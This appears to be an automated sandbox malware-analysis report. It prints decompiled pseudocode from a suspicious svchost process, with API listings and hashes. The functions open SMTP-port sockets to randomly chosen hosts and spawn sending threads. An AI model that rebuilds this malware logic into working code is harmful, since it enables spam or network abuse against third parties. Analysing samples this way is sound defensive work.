                                                                                                                                                                                                                                                                      				_v12 = 3;
                                                                                                                                                                                                                                                                      				_v528 = 0;
                                                                                                                                                                                                                                                                      				while(_v528 < 3) {
                                                                                                                                                                                                                                                                      					_v532 = 0;
                                                                                                                                                                                                                                                                      					while(_v532 < 0x46) {
                                                                                                                                                                                                                                                                      						E04001260(_t40,  &_v524, 0, 0x200);
                                                                                                                                                                                                                                                                      						_v544 = E04001430(0x64);
                                                                                                                                                                                                                                                                      						_v540 = E04001430(7);
                                                                                                                                                                                                                                                                      						_t40 = E04001160(_v540,  *((intOrPtr*)(0x4088c00 + _v540 * 4)), 0x19, 1, 0x1388); // executed
                                                                                                                                                                                                                                                                      						_t73 = _t73 + 0x24;
                                                                                                                                                                                                                                                                      						_v536 = _t40;
                                                                                                                                                                                                                                                                      						if(_v536 == 0xffffffff) {
                                                                                                                                                                                                                                                                      							Sleep(1); // executed
                                                                                                                                                                                                                                                                      							_v532 = _v532 + 1;
                                                                                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							E040013B0( &_v524, _v544); // executed
                                                                                                                                                                                                                                                                      							 *0x400304c( &_v524, 0x4003134);
                                                                                                                                                                                                                                                                      							_v556 = GetTickCount();
                                                                                                                                                                                                                                                                      							E040010E0(_v536,  &_v524, _v544); // executed
                                                                                                                                                                                                                                                                      							_v548 = 0;
                                                                                                                                                                                                                                                                      							_v552 = 0;
                                                                                                                                                                                                                                                                      							E04001040(_v536,  &_v524, 0x200,  &_v548,  &_v552); // executed
                                                                                                                                                                                                                                                                      							_t73 = _t73 + 0x28;
                                                                                                                                                                                                                                                                      							_v8 = _v552 - _v556 + _v8;
                                                                                                                                                                                                                                                                      							_push(_v536); // executed
                                                                                                                                                                                                                                                                      							L04001000(); // executed
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						break;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t40 = _v528 + 1;
                                                                                                                                                                                                                                                                      					_v528 = _v528 + 1;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                                                                                      				return _v8 / 3;
                                                                                                                                                                                                                                                                      			}















                                                                                                                                                                                                                                                                      0x04001499
                                                                                                                                                                                                                                                                      0x040014a0
                                                                                                                                                                                                                                                                      0x040014a7
                                                                                                                                                                                                                                                                      0x040014c2
                                                                                                                                                                                                                                                                      0x040014cf
                                                                                                                                                                                                                                                                      0x040014ea
                                                                                                                                                                                                                                                                      0x04001505
                                                                                                                                                                                                                                                                      0x04001517
                                                                                                                                                                                                                                                                      0x04001527
                                                                                                                                                                                                                                                                      0x04001544
                                                                                                                                                                                                                                                                      0x04001549
                                                                                                                                                                                                                                                                      0x0400154c
                                                                                                                                                                                                                                                                      0x04001559
                                                                                                                                                                                                                                                                      0x0400160f
                                                                                                                                                                                                                                                                      0x040014e4
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400155f
                                                                                                                                                                                                                                                                      0x0400156d
                                                                                                                                                                                                                                                                      0x04001581
                                                                                                                                                                                                                                                                      0x0400158d
                                                                                                                                                                                                                                                                      0x040015a8
                                                                                                                                                                                                                                                                      0x040015b0
                                                                                                                                                                                                                                                                      0x040015ba
                                                                                                                                                                                                                                                                      0x040015e5
                                                                                                                                                                                                                                                                      0x040015ea
                                                                                                                                                                                                                                                                      0x040015fc
                                                                                                                                                                                                                                                                      0x04001605
                                                                                                                                                                                                                                                                      0x04001606
                                                                                                                                                                                                                                                                      0x04001606
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04001559
                                                                                                                                                                                                                                                                      0x040014b9
                                                                                                                                                                                                                                                                      0x040014bc
                                                                                                                                                                                                                                                                      0x040014bc
                                                                                                                                                                                                                                                                      0x04001622
                                                                                                                                                                                                                                                                      0x0400162d

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 04001430: QueryPerformanceCounter.KERNEL32(00000000), ref: 04001444
                                                                                                                                                                                                                                                                        • Part of subcall function 04001160: socket.WS2_32(00000002,00000001,00000006), ref: 0400116C
                                                                                                                                                                                                                                                                      • Sleep.KERNELBASE(00000001), ref: 0400160F
                                                                                                                                                                                                                                                                        • Part of subcall function 040013B0: QueryPerformanceCounter.KERNEL32(?), ref: 040013E7
                                                                                                                                                                                                                                                                        • Part of subcall function 040013B0: Sleep.KERNELBASE(00000000), ref: 040013EF
                                                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                                                                                                      • closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CounterPerformanceQuerySleep$CountTickclosesocketlstrcatsocket
                                                                                                                                                                                                                                                                      • String ID: F
                                                                                                                                                                                                                                                                      • API String ID: 900668384-1304234792
                                                                                                                                                                                                                                                                      • Opcode ID: e6bc4524acd37c5f2a61d60cd04ada7e2da9e6c79a86eb7b70bf2b9ee635fd7d
                                                                                                                                                                                                                                                                      • Instruction ID: d79780824819048788ded504410e9a552de5875a97c05552d19a965bcf11c014
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6bc4524acd37c5f2a61d60cd04ada7e2da9e6c79a86eb7b70bf2b9ee635fd7d
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 053152B5D41218EBEB20EF94DC49BD973B4AB14308F0482D9E5197A2C1E7766F848F91
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                                                                                      			E040014B3() {
                                                                                                                                                                                                                                                                      				void* _t70;
                                                                                                                                                                                                                                                                      				void* _t72;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				L0:
                                                                                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                                                                                      					L0:
                                                                                                                                                                                                                                                                      					_t38 =  *((intOrPtr*)(_t70 - 0x20c)) + 1;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t70 - 0x20c)) =  *((intOrPtr*)(_t70 - 0x20c)) + 1;
                                                                                                                                                                                                                                                                      					L1:
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)(_t70 - 0x20c)) < 3) {
                                                                                                                                                                                                                                                                      						L2:
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t70 - 0x210)) = 0;
                                                                                                                                                                                                                                                                      						L4:
                                                                                                                                                                                                                                                                      						while( *((intOrPtr*)(_t70 - 0x210)) < 0x46) {
                                                                                                                                                                                                                                                                      							E04001260(_t38, _t70 - 0x208, 0, 0x200);
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_t70 - 0x21c)) = E04001430(0x64);
                                                                                                                                                                                                                                                                      							 *(_t70 - 0x218) = E04001430(7);
                                                                                                                                                                                                                                                                      							_t38 = E04001160( *(_t70 - 0x218),  *((intOrPtr*)(0x4088c00 +  *(_t70 - 0x218) * 4)), 0x19, 1, 0x1388); // executed
                                                                                                                                                                                                                                                                      							_t72 = _t72 + 0x24;
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_t70 - 0x214)) = _t38;
                                                                                                                                                                                                                                                                      							if( *((intOrPtr*)(_t70 - 0x214)) == 0xffffffff) {
                                                                                                                                                                                                                                                                      								L7:
                                                                                                                                                                                                                                                                      								Sleep(1); // executed
                                                                                                                                                                                                                                                                      								L3:
                                                                                                                                                                                                                                                                      								 *((intOrPtr*)(_t70 - 0x210)) =  *((intOrPtr*)(_t70 - 0x210)) + 1;
                                                                                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								L6:
                                                                                                                                                                                                                                                                      								E040013B0(_t70 - 0x208,  *((intOrPtr*)(_t70 - 0x21c))); // executed
                                                                                                                                                                                                                                                                      								 *0x400304c(_t70 - 0x208, 0x4003134);
                                                                                                                                                                                                                                                                      								 *((intOrPtr*)(_t70 - 0x228)) = GetTickCount();
                                                                                                                                                                                                                                                                      								E040010E0( *((intOrPtr*)(_t70 - 0x214)), _t70 - 0x208,  *((intOrPtr*)(_t70 - 0x21c))); // executed
                                                                                                                                                                                                                                                                      								 *((intOrPtr*)(_t70 - 0x220)) = 0;
                                                                                                                                                                                                                                                                      								 *((intOrPtr*)(_t70 - 0x224)) = 0;
                                                                                                                                                                                                                                                                      								E04001040( *((intOrPtr*)(_t70 - 0x214)), _t70 - 0x208, 0x200, _t70 - 0x220, _t70 - 0x224); // executed
                                                                                                                                                                                                                                                                      								 *(_t70 - 4) =  *((intOrPtr*)(_t70 - 0x224)) -  *((intOrPtr*)(_t70 - 0x228)) +  *(_t70 - 4);
                                                                                                                                                                                                                                                                      								_push( *((intOrPtr*)(_t70 - 0x214))); // executed
                                                                                                                                                                                                                                                                      								L04001000(); // executed
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							break;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					L9:
                                                                                                                                                                                                                                                                      					asm("cdq");
                                                                                                                                                                                                                                                                      					return  *(_t70 - 4) / 3;
                                                                                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      			}





                                                                                                                                                                                                                                                                      0x040014b3
                                                                                                                                                                                                                                                                      0x040014b3
                                                                                                                                                                                                                                                                      0x040014b3
                                                                                                                                                                                                                                                                      0x040014b9
                                                                                                                                                                                                                                                                      0x040014bc
                                                                                                                                                                                                                                                                      0x040014c2
                                                                                                                                                                                                                                                                      0x040014c9
                                                                                                                                                                                                                                                                      0x040014cf
                                                                                                                                                                                                                                                                      0x040014cf
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040014ea
                                                                                                                                                                                                                                                                      0x04001505
                                                                                                                                                                                                                                                                      0x04001517
                                                                                                                                                                                                                                                                      0x04001527
                                                                                                                                                                                                                                                                      0x04001544
                                                                                                                                                                                                                                                                      0x04001549
                                                                                                                                                                                                                                                                      0x0400154c
                                                                                                                                                                                                                                                                      0x04001559
                                                                                                                                                                                                                                                                      0x0400160d
                                                                                                                                                                                                                                                                      0x0400160f
                                                                                                                                                                                                                                                                      0x040014db
                                                                                                                                                                                                                                                                      0x040014e4
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400155f
                                                                                                                                                                                                                                                                      0x0400155f
                                                                                                                                                                                                                                                                      0x0400156d
                                                                                                                                                                                                                                                                      0x04001581
                                                                                                                                                                                                                                                                      0x0400158d
                                                                                                                                                                                                                                                                      0x040015a8
                                                                                                                                                                                                                                                                      0x040015b0
                                                                                                                                                                                                                                                                      0x040015ba
                                                                                                                                                                                                                                                                      0x040015e5
                                                                                                                                                                                                                                                                      0x040015fc
                                                                                                                                                                                                                                                                      0x04001605
                                                                                                                                                                                                                                                                      0x04001606
                                                                                                                                                                                                                                                                      0x04001606
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04001559
                                                                                                                                                                                                                                                                      0x0400161a
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400161a
                                                                                                                                                                                                                                                                      0x0400161f
                                                                                                                                                                                                                                                                      0x04001622
                                                                                                                                                                                                                                                                      0x0400162d
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400162d

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 04001430: QueryPerformanceCounter.KERNEL32(00000000), ref: 04001444
                                                                                                                                                                                                                                                                        • Part of subcall function 04001160: socket.WS2_32(00000002,00000001,00000006), ref: 0400116C
                                                                                                                                                                                                                                                                      • Sleep.KERNELBASE(00000001), ref: 0400160F
                                                                                                                                                                                                                                                                        • Part of subcall function 040013B0: QueryPerformanceCounter.KERNEL32(?), ref: 040013E7
                                                                                                                                                                                                                                                                        • Part of subcall function 040013B0: Sleep.KERNELBASE(00000000), ref: 040013EF
                                                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                                                                                                      • closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CounterPerformanceQuerySleep$CountTickclosesocketlstrcatsocket
                                                                                                                                                                                                                                                                      • String ID: F
                                                                                                                                                                                                                                                                      • API String ID: 900668384-1304234792
                                                                                                                                                                                                                                                                      • Opcode ID: 3f257ec96778accae7db7852b0fbcac80dd7221c206c2323f8e06a36ea41de21
                                                                                                                                                                                                                                                                      • Instruction ID: efc04feaa42e0dd8c691736b9f02f641cbb91c62c4f6f354fde5ae11d8ba4a5d
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f257ec96778accae7db7852b0fbcac80dd7221c206c2323f8e06a36ea41de21
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 423132B5D41218ABEB20EFA4DC89BD973B4AB18308F0482D5E5197A181E6756F84CF51
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                                                                                      			E040014DB() {
                                                                                                                                                                                                                                                                      				intOrPtr _t45;
                                                                                                                                                                                                                                                                      				void* _t71;
                                                                                                                                                                                                                                                                      				void* _t73;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				L0:
                                                                                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                                                                                      					L0:
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t71 - 0x210)) =  *((intOrPtr*)(_t71 - 0x210)) + 1;
                                                                                                                                                                                                                                                                      					L4:
                                                                                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                                                                                      						L4:
                                                                                                                                                                                                                                                                      						if( *((intOrPtr*)(_t71 - 0x210)) < 0x46) {
                                                                                                                                                                                                                                                                      							L5:
                                                                                                                                                                                                                                                                      							E04001260(_t38, _t71 - 0x208, 0, 0x200);
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_t71 - 0x21c)) = E04001430(0x64);
                                                                                                                                                                                                                                                                      							 *(_t71 - 0x218) = E04001430(7);
                                                                                                                                                                                                                                                                      							_t45 = E04001160( *(_t71 - 0x218),  *((intOrPtr*)(0x4088c00 +  *(_t71 - 0x218) * 4)), 0x19, 1, 0x1388); // executed
                                                                                                                                                                                                                                                                      							_t73 = _t73 + 0x24;
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_t71 - 0x214)) = _t45;
                                                                                                                                                                                                                                                                      							if( *((intOrPtr*)(_t71 - 0x214)) == 0xffffffff) {
                                                                                                                                                                                                                                                                      								L7:
                                                                                                                                                                                                                                                                      								Sleep(1); // executed
                                                                                                                                                                                                                                                                      								goto L0;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								L6:
                                                                                                                                                                                                                                                                      								E040013B0(_t71 - 0x208,  *((intOrPtr*)(_t71 - 0x21c))); // executed
                                                                                                                                                                                                                                                                      								 *0x400304c(_t71 - 0x208, 0x4003134);
                                                                                                                                                                                                                                                                      								 *((intOrPtr*)(_t71 - 0x228)) = GetTickCount();
                                                                                                                                                                                                                                                                      								E040010E0( *((intOrPtr*)(_t71 - 0x214)), _t71 - 0x208,  *((intOrPtr*)(_t71 - 0x21c))); // executed
                                                                                                                                                                                                                                                                      								 *((intOrPtr*)(_t71 - 0x220)) = 0;
                                                                                                                                                                                                                                                                      								 *((intOrPtr*)(_t71 - 0x224)) = 0;
                                                                                                                                                                                                                                                                      								E04001040( *((intOrPtr*)(_t71 - 0x214)), _t71 - 0x208, 0x200, _t71 - 0x220, _t71 - 0x224); // executed
                                                                                                                                                                                                                                                                      								_t73 = _t73 + 0x28;
                                                                                                                                                                                                                                                                      								 *(_t71 - 4) =  *((intOrPtr*)(_t71 - 0x224)) -  *((intOrPtr*)(_t71 - 0x228)) +  *(_t71 - 4);
                                                                                                                                                                                                                                                                      								_push( *((intOrPtr*)(_t71 - 0x214))); // executed
                                                                                                                                                                                                                                                                      								L04001000(); // executed
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                                                                                      						L1:
                                                                                                                                                                                                                                                                      						_t38 =  *((intOrPtr*)(_t71 - 0x20c)) + 1;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t71 - 0x20c)) =  *((intOrPtr*)(_t71 - 0x20c)) + 1;
                                                                                                                                                                                                                                                                      						L2:
                                                                                                                                                                                                                                                                      						if( *((intOrPtr*)(_t71 - 0x20c)) < 3) {
                                                                                                                                                                                                                                                                      							L3:
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_t71 - 0x210)) = 0;
                                                                                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                                                                                      						asm("cdq");
                                                                                                                                                                                                                                                                      						return  *(_t71 - 4) / 3;
                                                                                                                                                                                                                                                                      						L10:
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      			}






                                                                                                                                                                                                                                                                      0x040014db
                                                                                                                                                                                                                                                                      0x040014db
                                                                                                                                                                                                                                                                      0x040014db
                                                                                                                                                                                                                                                                      0x040014e4
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040014ea
                                                                                                                                                                                                                                                                      0x040014ea
                                                                                                                                                                                                                                                                      0x040014f1
                                                                                                                                                                                                                                                                      0x040014f7
                                                                                                                                                                                                                                                                      0x04001505
                                                                                                                                                                                                                                                                      0x04001517
                                                                                                                                                                                                                                                                      0x04001527
                                                                                                                                                                                                                                                                      0x04001544
                                                                                                                                                                                                                                                                      0x04001549
                                                                                                                                                                                                                                                                      0x0400154c
                                                                                                                                                                                                                                                                      0x04001559
                                                                                                                                                                                                                                                                      0x0400160d
                                                                                                                                                                                                                                                                      0x0400160f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400155f
                                                                                                                                                                                                                                                                      0x0400155f
                                                                                                                                                                                                                                                                      0x0400156d
                                                                                                                                                                                                                                                                      0x04001581
                                                                                                                                                                                                                                                                      0x0400158d
                                                                                                                                                                                                                                                                      0x040015a8
                                                                                                                                                                                                                                                                      0x040015b0
                                                                                                                                                                                                                                                                      0x040015ba
                                                                                                                                                                                                                                                                      0x040015e5
                                                                                                                                                                                                                                                                      0x040015ea
                                                                                                                                                                                                                                                                      0x040015fc
                                                                                                                                                                                                                                                                      0x04001605
                                                                                                                                                                                                                                                                      0x04001606
                                                                                                                                                                                                                                                                      0x04001606
                                                                                                                                                                                                                                                                      0x04001559
                                                                                                                                                                                                                                                                      0x0400161a
                                                                                                                                                                                                                                                                      0x040014b3
                                                                                                                                                                                                                                                                      0x040014b9
                                                                                                                                                                                                                                                                      0x040014bc
                                                                                                                                                                                                                                                                      0x040014c2
                                                                                                                                                                                                                                                                      0x040014c9
                                                                                                                                                                                                                                                                      0x040014cf
                                                                                                                                                                                                                                                                      0x040014cf
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040014cf
                                                                                                                                                                                                                                                                      0x0400161f
                                                                                                                                                                                                                                                                      0x04001622
                                                                                                                                                                                                                                                                      0x0400162d
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400162d
                                                                                                                                                                                                                                                                      0x040014ea

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 04001430: QueryPerformanceCounter.KERNEL32(00000000), ref: 04001444
                                                                                                                                                                                                                                                                        • Part of subcall function 04001160: socket.WS2_32(00000002,00000001,00000006), ref: 0400116C
                                                                                                                                                                                                                                                                      • Sleep.KERNELBASE(00000001), ref: 0400160F
                                                                                                                                                                                                                                                                        • Part of subcall function 040013B0: QueryPerformanceCounter.KERNEL32(?), ref: 040013E7
                                                                                                                                                                                                                                                                        • Part of subcall function 040013B0: Sleep.KERNELBASE(00000000), ref: 040013EF
                                                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                                                                                                      • closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CounterPerformanceQuerySleep$CountTickclosesocketlstrcatsocket
                                                                                                                                                                                                                                                                      • String ID: F
                                                                                                                                                                                                                                                                      • API String ID: 900668384-1304234792
                                                                                                                                                                                                                                                                      • Opcode ID: cf3c1adff95c02d838a93fa7c3e08858ca76797544e8a022648dccf564d39913
                                                                                                                                                                                                                                                                      • Instruction ID: 6ed18f16ab0dd41aabad2fa4162e749fae483d95e79aad030a55c0feddf4590a
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf3c1adff95c02d838a93fa7c3e08858ca76797544e8a022648dccf564d39913
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 383164B5D4021CABEB24EF94DC88BD97374AB18308F0482D8E51D7A181EB75AF84CF51
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E04001989() {
                                                                                                                                                                                                                                                                      				intOrPtr _t48;
                                                                                                                                                                                                                                                                      				intOrPtr _t50;
                                                                                                                                                                                                                                                                      				intOrPtr _t53;
                                                                                                                                                                                                                                                                      				void* _t58;
                                                                                                                                                                                                                                                                      				void* _t64;
                                                                                                                                                                                                                                                                      				void* _t86;
                                                                                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                                                                                      				void* _t88;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                                                                                      					_t48 = E04001490(); // executed
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t86 - 0x19c)) = _t48;
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)(_t86 - 0x19c)) <= 0 ||  *((intOrPtr*)(_t86 - 0x19c)) >= 0x2710) {
                                                                                                                                                                                                                                                                      						Sleep(0x7530);
                                                                                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						 *0x4088c2c = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                      						_t50 = E040023E0( *(0x4088c1c +  *(_t86 - 0x194) * 4)); // executed
                                                                                                                                                                                                                                                                      						_t88 = _t87 + 4;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t86 - 0x1a0)) = _t50;
                                                                                                                                                                                                                                                                      						if( *((intOrPtr*)(_t86 - 0x1a0)) != 0) {
                                                                                                                                                                                                                                                                      							E04001DC0( *((intOrPtr*)(_t86 - 0x1a0)), 0x4085600); // executed
                                                                                                                                                                                                                                                                      							_t64 = E04001470(0xc);
                                                                                                                                                                                                                                                                      							_t88 = _t88 + 0xc;
                                                                                                                                                                                                                                                                      							 *(_t86 - 0x1b4) = _t64;
                                                                                                                                                                                                                                                                      							 *(_t86 - 0x1a4) =  *(_t86 - 0x1b4);
                                                                                                                                                                                                                                                                      							 *( *(_t86 - 0x1a4)) =  *(0x4088c1c +  *(_t86 - 0x194) * 4);
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)( *(_t86 - 0x1a4) + 4)) =  *((intOrPtr*)(_t86 - 0x1a0));
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)( *(_t86 - 0x1a4) + 8)) = 0x4085600;
                                                                                                                                                                                                                                                                      							CreateThread(0, 0, E04001630,  *(_t86 - 0x1a4), 0, 0); // executed
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						 *(_t86 - 0x1a8) = 0;
                                                                                                                                                                                                                                                                      						while( *(_t86 - 0x1a8) < 3) {
                                                                                                                                                                                                                                                                      							_t53 = E040023E0( *(0x4088c20 + ( *((intOrPtr*)(_t86 - 0x198)) +  *(_t86 - 0x1a8)) * 4)); // executed
                                                                                                                                                                                                                                                                      							_t88 = _t88 + 4;
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_t86 - 0x1ac)) = _t53;
                                                                                                                                                                                                                                                                      							if( *((intOrPtr*)(_t86 - 0x1ac)) != 0) {
                                                                                                                                                                                                                                                                      								E04001DC0( *((intOrPtr*)(_t86 - 0x1ac)), 0x4085600); // executed
                                                                                                                                                                                                                                                                      								_t58 = E04001470(0xc);
                                                                                                                                                                                                                                                                      								_t88 = _t88 + 0xc;
                                                                                                                                                                                                                                                                      								 *(_t86 - 0x1b8) = _t58;
                                                                                                                                                                                                                                                                      								 *(_t86 - 0x1b0) =  *(_t86 - 0x1b8);
                                                                                                                                                                                                                                                                      								 *( *(_t86 - 0x1b0)) =  *(0x4088c20 + ( *((intOrPtr*)(_t86 - 0x198)) +  *(_t86 - 0x1a8)) * 4);
                                                                                                                                                                                                                                                                      								 *((intOrPtr*)( *(_t86 - 0x1b0) + 4)) =  *((intOrPtr*)(_t86 - 0x1ac));
                                                                                                                                                                                                                                                                      								 *((intOrPtr*)( *(_t86 - 0x1b0) + 8)) = 0x4085600;
                                                                                                                                                                                                                                                                      								CreateThread(0, 0, E04001630,  *(_t86 - 0x1b0), 0, 0); // executed
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							 *(_t86 - 0x1a8) =  *(_t86 - 0x1a8) + 1;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						WaitForSingleObject( *0x4088c2c, 0xffffffff);
                                                                                                                                                                                                                                                                      						Sleep(0x9c40);
                                                                                                                                                                                                                                                                      						L04001006();
                                                                                                                                                                                                                                                                      						ExitProcess(0);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      			}











                                                                                                                                                                                                                                                                      0x04001996
                                                                                                                                                                                                                                                                      0x040017b6
                                                                                                                                                                                                                                                                      0x040017bb
                                                                                                                                                                                                                                                                      0x040017c8
                                                                                                                                                                                                                                                                      0x04001990
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040017de
                                                                                                                                                                                                                                                                      0x040017ec
                                                                                                                                                                                                                                                                      0x040017ff
                                                                                                                                                                                                                                                                      0x04001804
                                                                                                                                                                                                                                                                      0x04001807
                                                                                                                                                                                                                                                                      0x04001814
                                                                                                                                                                                                                                                                      0x04001822
                                                                                                                                                                                                                                                                      0x0400182c
                                                                                                                                                                                                                                                                      0x04001831
                                                                                                                                                                                                                                                                      0x04001834
                                                                                                                                                                                                                                                                      0x04001840
                                                                                                                                                                                                                                                                      0x04001859
                                                                                                                                                                                                                                                                      0x04001867
                                                                                                                                                                                                                                                                      0x04001870
                                                                                                                                                                                                                                                                      0x0400188b
                                                                                                                                                                                                                                                                      0x0400188b
                                                                                                                                                                                                                                                                      0x04001891
                                                                                                                                                                                                                                                                      0x040018ac
                                                                                                                                                                                                                                                                      0x040018cd
                                                                                                                                                                                                                                                                      0x040018d2
                                                                                                                                                                                                                                                                      0x040018d5
                                                                                                                                                                                                                                                                      0x040018e2
                                                                                                                                                                                                                                                                      0x040018f4
